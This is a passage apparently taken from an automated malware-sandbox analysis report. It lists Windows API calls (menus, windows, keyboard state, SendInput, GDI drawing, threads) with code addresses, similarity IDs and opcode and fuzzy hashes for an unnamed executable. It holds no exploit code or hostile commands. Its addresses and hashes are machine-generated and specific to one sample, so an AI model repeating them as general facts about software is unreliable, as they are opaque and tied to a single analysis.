                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                        • _wcslen.LIBCMT ref: 0047A79E
                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                        Similarity
                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                        • String ID:
                        • API String ID: 3257027151-0
                        APIs
                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                        Similarity
                        • API ID: ErrorLastselect
                        • String ID:
                        • API String ID: 215497628-0
                        APIs
                        • GetParent.USER32(?), ref: 0044443B
                        • GetKeyboardState.USER32(?), ref: 00444450
                        • SetKeyboardState.USER32(?), ref: 004444A4
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        APIs
                        • GetParent.USER32(?), ref: 00444633
                        • GetKeyboardState.USER32(?), ref: 00444648
                        • SetKeyboardState.USER32(?), ref: 0044469C
                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        APIs
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Similarity
                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                        • String ID:
                        • API String ID: 2354583917-0
                        APIs
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                        Similarity
                        • API ID: Window$Enable$Show$MessageMoveSend
                        • String ID:
                        • API String ID: 896007046-0
                        APIs
                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                        • GetFocus.USER32 ref: 00448ACF
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                        Similarity
                        • API ID: Window$Enable$Show$FocusMessageSend
                        • String ID:
                        • API String ID: 3429747543-0
                        APIs
                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                        Similarity
                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                        • String ID:
                        • API String ID: 3300667738-0
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                        • __swprintf.LIBCMT ref: 0045D4E9
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu$\VH
                        • API String ID: 3164766367-2432546070
                        APIs
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                        Similarity
                        • API ID: MessageSend
                        • String ID: Msctls_Progress32
                        • API String ID: 3850602802-3636473452
                        APIs
                        Similarity
                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                        • String ID:
                        • API String ID: 3985565216-0
                        APIs
                        • _malloc.LIBCMT ref: 0041F707
                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                        • _free.LIBCMT ref: 0041F71A
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID: [B
                        • API String ID: 1020059152-632041663
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                        • __calloc_crt.LIBCMT ref: 00413DB0
                        • __getptd.LIBCMT ref: 00413DBD
                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                        • _free.LIBCMT ref: 00413E07
                        • __dosmaperr.LIBCMT ref: 00413E12
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        Similarity
                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                        • String ID:
                        • API String ID: 155776804-0
                        APIs
                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                        • ExitThread.KERNEL32 ref: 00413D4E
                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                        • __freefls@4.LIBCMT ref: 00413D74
                        Similarity
                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                        • String ID:
                        • API String ID: 259663610-0
                        APIs
                        • GetClientRect.USER32(?,?), ref: 004302E6
                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                        • GetClientRect.USER32(?,?), ref: 00430364
                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                        • GetWindowRect.USER32(?,?), ref: 004303C3
                        • ScreenToClient.USER32(?,?), ref: 004303EC
                        Similarity
                        • API ID: Rect$Client$Window$MetricsScreenSystem
                        • String ID:
                        • API String ID: 3220332590-0
                        APIs
                        Similarity
                        • API ID: _malloc_wcslen$_strcat_wcscpy
                        • String ID:
                        • API String ID: 1612042205-0
                        APIs
                        Similarity
                        • API ID: _memmove_strncmp
                        • String ID: >$U$\
                        • API String ID: 2666721431-237099441
                        APIs
                        • GetKeyboardState.USER32(?), ref: 0044C570
                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                        Similarity
                        • API ID: MessagePost$KeyboardState$InputSend
                        • String ID:
                        • API String ID: 2221674350-0
                        APIs
                        Similarity
                        • API ID: _wcscpy$_wcscat
                        • String ID:
                        • API String ID: 2037614760-0
                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                        APIs
                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                        • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                        • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                        • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                        Similarity
                        • API ID: Variant$Copy$AllocClearErrorLastString
                        • String ID:
                        • API String ID: 960795272-0
                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                        APIs
                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                        • EndPaint.USER32(?,?), ref: 00447D13
                        Similarity
                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                        • String ID:
                        • API String ID: 4189319755-0
                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                        APIs
                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                        Similarity
                        • API ID: MessageSend$LongWindow$InvalidateRect
                        • String ID:
                        • API String ID: 1976402638-0
                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                        APIs
                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                        Strings
                        Similarity
                        • API ID: Variant$Copy$ClearErrorLast
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 2487901850-572801152
                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                        APIs
                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                        Similarity
                        • API ID: Window$Enable$Show$MessageSend
                        • String ID:
                        • API String ID: 1871949834-0
                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                        APIs
                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                        • SendMessageW.USER32 ref: 00471AE3
                        • DestroyIcon.USER32(?), ref: 00471AF4
                        Similarity
                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                        • String ID:
                        • API String ID: 3611059338-0
                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                        APIs
                        Similarity
                        • API ID: DestroyWindow$DeleteObject$IconMove
                        • String ID:
                        • API String ID: 1640429340-0
                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                        APIs
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • _wcslen.LIBCMT ref: 004438CD
                        • _wcslen.LIBCMT ref: 004438E6
                        • _wcstok.LIBCMT ref: 004438F8
                        • _wcslen.LIBCMT ref: 0044390C
                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                        • _wcstok.LIBCMT ref: 00443931
                        Similarity
                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                        • String ID:
                        • API String ID: 3632110297-0
                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                        APIs
                        Similarity
                        • API ID: Destroy$DeleteMenuObject$IconWindow
                        • String ID:
                        • API String ID: 752480666-0
                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                        APIs
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                        • String ID:
                        • API String ID: 3275902921-0
                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                        APIs
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                        • String ID:
                        • API String ID: 3275902921-0
                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                        APIs
                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                        APIs
                        • SendMessageW.USER32 ref: 004555C7
                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Similarity
                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                        • String ID:
                        • API String ID: 3691411573-0
                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                        APIs
                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                        • LineTo.GDI32(?,?,?), ref: 004472AC
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                        • LineTo.GDI32(?,?,?), ref: 004472C6
                        • EndPath.GDI32(?), ref: 004472D6
                        • StrokePath.GDI32(?), ref: 004472E4
                        Similarity
                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                        • String ID:
                        • API String ID: 372113273-0
                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                        APIs
                        • GetDC.USER32(00000000), ref: 0044CC6D
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                        APIs
                        • __getptd.LIBCMT ref: 0041708E
                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                        • __amsg_exit.LIBCMT ref: 004170AE
                        • __lock.LIBCMT ref: 004170BE
                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                        • _free.LIBCMT ref: 004170EE
                        • InterlockedIncrement.KERNEL32(02EE2D10), ref: 00417106
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 3470314060-0
                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                        • ExitThread.KERNEL32 ref: 004151ED
                        • __freefls@4.LIBCMT ref: 00415209
                        Similarity
                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                        • String ID:
                        • API String ID: 442100245-0
                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
